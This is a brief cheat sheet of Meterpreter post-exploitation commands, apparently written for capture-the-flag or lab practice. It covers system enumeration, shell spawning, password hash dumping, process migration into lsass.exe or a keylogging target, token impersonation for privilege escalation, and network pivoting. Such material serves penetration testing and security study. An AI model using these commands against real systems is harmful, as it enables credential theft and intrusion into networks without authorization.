https://github.com/rapid7/meterpreter
METERPRETER Enumeration
sysinfo - Info about the system.
getuid - Get the current user.
getenv - Get one or more environment variable values.
search -f flag.txt - Search for a file on the machine.
METERPRETER File Upload
upload - Upload a file or directory.
download - Download a file or directory.
METERPRETER Spawn Shell
shell - Spawn a shell.
load powershell - Load the PowerShell extension.
powershell_shell - Spawn PowerShell.
METERPRETER Attacks
hashdump - Dump hashes from the Windows SAM database (for Linux, use the module linux/gather/hashdump).
migrate 716 - Migrate to another process. Ex: migrate to word.exe and act as a keylogger. Ex: migrate to lsass.exe to run hashdump.
METERPRETER Impersonate
When SeDebugPrivilege and SeImpersonatePrivilege are enabled, we can impersonate another user.
load incognito - Load the incognito extension.
list_tokens -g - List tokens.
impersonate_token "BUILTIN\Administrators" - Impersonate a token.
To determine rights, Windows uses the primary token of the process and not the impersonated token, so we have to migrate to a process with the correct permissions.
The safest process to pick is services.exe.
migrate 668 - Migrate to process 668.
METERPRETER Pivoting
When we have a Meterpreter shell on a machine that has access to another network, we can use it to gain access to that second network.
run autoroute -s [REMOTE_NETWORK]/24 - Create a route via the host we already have access to.
run autoroute -p - Show the added routes.